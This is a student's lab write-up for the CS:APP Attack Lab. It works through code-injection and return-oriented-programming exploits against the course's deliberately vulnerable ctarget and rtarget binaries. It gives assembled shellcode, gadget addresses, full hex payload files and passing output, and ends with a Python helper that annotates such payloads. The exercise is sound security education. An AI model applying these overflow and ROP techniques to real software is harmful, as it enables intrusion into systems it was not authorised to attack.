Computer Systems Lab 3 - The Attack Lab: Understanding Buffer Overflow Bugs

Using gdb ctarget, (gdb) b test and (gdb) r -q, find the cookie (0x59b997fa), which is the value touch2 must be called with:

    csapp@ubuntu:~/Lab3/target1$ gdb ctarget
    Reading symbols from ctarget...done.
    (gdb) b test
    Breakpoint 1 at 0x401968: file visible.c, line 93.
    (gdb) r -q
    Starting program: /home/csapp/Lab3/target1/ctarget -q
    Cookie: 0x59b997fa
    Breakpoint 1, test () at visible.c:90
    90      visible.c: No such file or directory.

In target1 create the file insertvalue.s with the code to inject:

    movq  $0x59b997fa, %rdi    # put the cookie into %rdi, the first argument of touch2
    pushq $0x004017ec          # address of touch2
    ret

Assemble it and disassemble the object file:

    csapp@ubuntu:~/Lab3/target1$ gcc -c insertvalue.s
    csapp@ubuntu:~/Lab3/target1$ objdump -d insertvalue.o > insertvalue.d

The directory now contains insertvalue.o and insertvalue.d. Looking at insertvalue.d:

    insertvalue.o:     file format elf64-x86-64

    Disassembly of section .text:

    0000000000000000 <.text>:
       0:   48 c7 c7 fa 97 b9 59    mov    $0x59b997fa,%rdi
       7:   68 ec 17 40 00          pushq  $0x4017ec
       c:   c3                      retq

This stores the cookie in %rdi. Next we need the value of %rsp inside getbuf. Set a breakpoint there and look at the registers; %rsp is 0x5561dc78:

    (gdb) b *0x4017af
    Breakpoint 1 at 0x4017af: file buf.c, line 14.
    (gdb) r -q
    Breakpoint 1, 0x00000000004017af in getbuf () at buf.c:14
    (gdb) info registers
    ...
    rsp            0x5561dc78          0x5561dc78
    ...

Finally pad the injected code to 40 bytes and append the return address (the buffer start, i.e. %rsp, in little-endian order):

    48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 30 30 30 30 30 30 30 30 30 30 30
    30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
    78 DC 61 55 00 00 00 00

Save this in target1 as target21.txt, then check the result with:

    cat target21.txt | ./hex2raw | ./ctarget -q

Phase 3

    void touch3(char *sval)
    {
        if (hexmatch(cookie, sval)) {
            printf("Touch3!: You called touch3(\"%s\")\n", sval);
            validate(3);
        } else {
            printf("Misfire: You called touch3(\"%s\")\n", sval);
            fail(3);
        }
        exit(0);
    }

Phase 3 resembles phase 2; the key difference is that the cookie is now passed as a string argument. If the cookie string were stored in getbuf's own frame, the local variables used when hexmatch is called could overwrite it, so the cookie is stored in the frame of getbuf's caller instead. From phase 2 we know that %rsp in getbuf is 0x5561dc78 and that %rsp+0x28 holds the return address, so the first slot above the return address is %rsp+0x30 (0x28 + 8, where 8 is the size of one stack slot), i.e. 0x5561dca8. touch3 is at 0x4018fa, so the assembly is:

    movq  $0x5561dca8, %rdi    # address where the cookie string will be placed
    pushq $0x004018fa          # address of touch3
    ret

In target1 create bufinsert.s with this code, then assemble and disassemble it:

    csapp@ubuntu:~/Lab3/target1$ gcc -c bufinsert.s
    bufinsert.s: Assembler messages:
    bufinsert.s: Warning: end of file not at end of a line; newline inserted
    csapp@ubuntu:~/Lab3/target1$ objdump -d bufinsert.o > bufinsert.d

bufinsert.d gives the encoding of the injected code:

    bufinsert.o:     file format elf64-x86-64

    Disassembly of section .text:

    0000000000000000 <.text>:
       0:   48 c7 c7 a8 dc 61 55    mov    $0x5561dca8,%rdi
       7:   68 fa 18 40 00          pushq  $0x4018fa
       c:   c3                      retq

Injected code string: 48c7c7a8dc615568fa184000c3, padded to 40 bytes.
Address of the injected code: 78dc615500000000 (the stack pointer position).

Then build the string. The cookie 0x59b997fa has to be written in ASCII; man ascii gives 35 39 62 39 39 37 66 61, followed by a terminating 00:

    48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    78 dc 61 55 00 00 00 00
    35 39 62 39 39 37 66 61 00

Save this as target31.txt (the author used 30 rather than 00 as the filler byte) and run it:

    csapp@ubuntu:~/Lab3/target1$ cat target31.txt | ./hex2raw | ./ctarget -q
    Cookie: 0x59b997fa
    Type string:Touch3!: You called touch3("59b997fa")
    Valid solution for level 3 with target ctarget
    PASS: Would have posted the following:
            user id bovik
            course  15213-f15
            lab     attacklab
            result  1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00

Phase 4

Because the stack is randomized in rtarget, we cannot jump to a fixed %rsp any more, so we use ROP and attack with the program's own code fragments. The task is the same as phase 2: call touch2 with the cookie as its argument. As in phase 2 the cookie is 0x59b997fa and touch2 is at 0x4017ec; the main job is to get the cookie into %rdi.

Table B, encodings of popq instructions:

    Operation   Register R
                %rax  %rcx  %rdx  %rbx  %rsp  %rbp  %rsi  %rdi
    popq R      58    59    5a    5b    5c    5d    5e    5f

The simplest plan would be to put the cookie on the stack and pop it straight into %rdi, which needs the byte 5f (popq %rdi, see the table); the farm contains no such gadget. It does contain 58, popq %rax:

    00000000004019a7 <addval_219>:
      4019a7:   8d 87 51 73 58 c3       lea    -0x3ca78caf(%rdi),%eax
      4019ad:   c3                      retq

Counting bytes, the 58 is at 0x4019ab, so that is gadget1 (58 c3 = popq %rax; ret). The chain is therefore:

    popq %rax
    movq %rax, %rdi
    ret

So we look for movq %rax,%rdi, whose encoding is 48 89 c7; ret is c3.

    Source %rax, movq %rax,D
    D:   %rax      %rcx      %rdx      %rbx      %rsp      %rbp      %rsi      %rdi
         48 89 c0  48 89 c1  48 89 c2  48 89 c3  48 89 c4  48 89 c5  48 89 c6  48 89 c7

We find it here:

    00000000004019c3 <setval_426>:
      4019c3:   c7 07 48 89 c7 90       movl   $0x90c78948,(%rdi)
      4019c9:   c3                      retq

As before, the gadget starts at 0x4019c5 (48 89 c7 90 c3 = movq %rax,%rdi; nop; ret); this is gadget2.

The file therefore contains: 1. the 40-byte padding, 2. the address of gadget1, 3. the cookie, 4. the address of gadget2, 5. the address of touch2. In target1 create target41.txt:

    cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
    cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
    ab 19 40 00 00 00 00 00
    fa 97 b9 59 00 00 00 00
    c5 19 40 00 00 00 00 00
    ec 17 40 00 00 00 00 00

Run cat target41.txt | ./hex2raw | ./rtarget -q to test; the attack succeeds:

    csapp@ubuntu:~/Lab3/target1$ cat target41.txt | ./hex2raw | ./rtarget -q
    Cookie: 0x59b997fa
    Type string:Touch2!: You called touch2(0x59b997fa)
    Valid solution for level 2 with target rtarget
    PASS: Would have posted the following:
            user id bovik
            course  15213-f15
            lab     attacklab
            result  1:PASS:0xffffffff:rtarget:2:CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC AB 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 C5 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00

Phase 5

This phase is like phase 3: the cookie is converted to a string and passed to touch3. There are two ways to solve it; I chose searching for gadgets.

First look for code that involves %rsp, namely movq %rsp,%rax (48 89 e0). It is found in:

    0000000000401aab <setval_350>:
      401aab:   c7 07 48 89 e0 90       movl   $0x90e08948,(%rdi)
      401ab1:   c3                      retq

As in phase 4, the gadget's start address is 0x401aad; this is gadget1.

Next we need a fragment that increases %rax so that it points at the cookie. We found add_xy, whose lea (%rdi,%rsi,1),%rax contains the bytes 04 37:

    00000000004019d6 <add_xy>:
      4019d6:   48 8d 04 37             lea    (%rdi,%rsi,1),%rax
      4019da:   c3                      retq

04 37 decodes as add $0x37,%al, so gadget2 is at 0x4019d8.

The last step is movq %rax,%rdi, i.e. 48 89 c7:

    00000000004019a0 <addval_273>:
      4019a0:   8d 87 48 89 c7 c3       lea    -0x3c3876b8(%rdi),%eax
      4019a6:   c3                      retq

So gadget3 is at 0x4019a2.

In summary, the final file has these parts: 1. the 40-byte padding; 2. the addresses of gadget1, gadget2, gadget3 and touch3; 3. a second padding; 4. the cookie as a string. The stack looks like this:

    %rsp-40     padding (40 bytes)
    %rsp        0x401aad   gadget1: movq %rsp,%rax
    %rsp+8      0x4019d8   gadget2: add $0x37,%al
    %rsp+16     0x4019a2   gadget3: movq %rax,%rdi
    %rsp+24     0x4018fa   touch3
    %rsp+32     padding 2
    %rsp+0x37   cookie string

The 0x37 is measured from the %rsp that gadget1 sees: by the time movq %rsp,%rax executes, getbuf's ret has already popped gadget1's address, so %rsp points at the gadget2 slot. From there the three remaining 8-byte slots (gadget2, gadget3, touch3) take 24 bytes, so the second padding is 55 (0x37) - 3*8 = 31 bytes, and the string then starts exactly at %rax + 0x37. From phase 3 the string form of the cookie is 35 39 62 39 39 37 66 61 00.

In target1 create target51.txt:

    cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
    cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
    ad 1a 40 00 00 00 00 00
    d8 19 40 00 00 00 00 00
    a2 19 40 00 00 00 00 00
    fa 18 40 00 00 00 00 00
    dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd
    dd dd dd dd dd dd dd dd dd dd dd
    35 39 62 39 39 37 66 61 00

Run cat target51.txt | ./hex2raw | ./rtarget -q to test; the attack succeeds:

    csapp@ubuntu:~/Lab3/target1$ cat target51.txt | ./hex2raw | ./rtarget -q
    Cookie: 0x59b997fa
    Type string:Touch3!: You called touch3("59b997fa")
    Valid solution for level 3 with target rtarget
    PASS: Would have posted the following:
            user id bovik
            course  15213-f15
            lab     attacklab
            result  1:PASS:0xffffffff:rtarget:3:CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC AD 1A 40 00 00 00 00 00 D8 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD 35 39 62 39 39 37 66 61 00
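To check a hex2raw-format string against the stack layouts described in phases 4 and 5 (the way a grader or an analyst reading a captured input would), here is an added Python helper; it is not part of the original report or of the lab's own tools. The sample text and the symbol table are constructed from the addresses the report states and are only meaningful for the target1 build it used.

```python
import re
from typing import List, Tuple

# Constructed input: the report's phase 4 chain written in hex2raw format
# (40 bytes of 0xcc buffer filler, then four 8-byte little-endian words).
PHASE4_TEXT = """
cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
ab 19 40 00 00 00 00 00  /* gadget1 */
fa 97 b9 59 00 00 00 00  /* cookie */
c5 19 40 00 00 00 00 00  /* gadget2 */
ec 17 40 00 00 00 00 00  /* touch2 */
"""

COOKIE = 0x59b997fa
BUF_SIZE = 40  # size of getbuf's buffer in this report's target
# Addresses named in the report; they hold only for the target1 build it used.
SYMBOLS = {
    0x4017ec: "touch2", 0x4018fa: "touch3",
    0x4019ab: "popq %rax; ret", 0x4019c5: "movq %rax,%rdi; nop; ret",
    0x401aad: "movq %rsp,%rax; nop; ret", 0x4019d8: "add $0x37,%al; ret",
    0x4019a2: "movq %rax,%rdi; ret",
}

def parse_hex2raw(text: str) -> bytes:
    """Read hex2raw input: whitespace-separated byte pairs, C block comments ignored."""
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return bytes(int(tok, 16) for tok in text.split())

def annotate(payload: bytes, buf_size: int = BUF_SIZE) -> List[Tuple[int, int, str]]:
    """Label each 8-byte stack word that lands above the buffer: (offset, value, label)."""
    rows = []
    words = payload[buf_size:]
    for i in range(0, len(words) - len(words) % 8, 8):
        val = int.from_bytes(words[i:i + 8], "little")
        if val == COOKIE:
            label = "cookie"
        elif val in SYMBOLS:
            label = SYMBOLS[val]
        elif 0x400000 <= val < 0x500000:
            label = "code address (not in symbol table)"
        else:
            label = "data / filler"
        rows.append((buf_size + i, val, label))
    return rows

def cookie_string_offset(payload: bytes, buf_size: int = BUF_SIZE) -> int:
    """Offset of the NUL-terminated ASCII cookie from the return-address slot, or -1."""
    pos = payload.find(b"%08x\0" % COOKIE)
    return -1 if pos < 0 else pos - buf_size

if __name__ == "__main__":
    for off, val, label in annotate(parse_hex2raw(PHASE4_TEXT)):
        print(f"buf+{off:<3} {val:#018x}  {label}")
```

For the phase 5 layout, cookie_string_offset returns 0x3f, which is the 8 bytes already popped before gadget1 runs plus the 0x37 that add $0x37,%al contributes.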
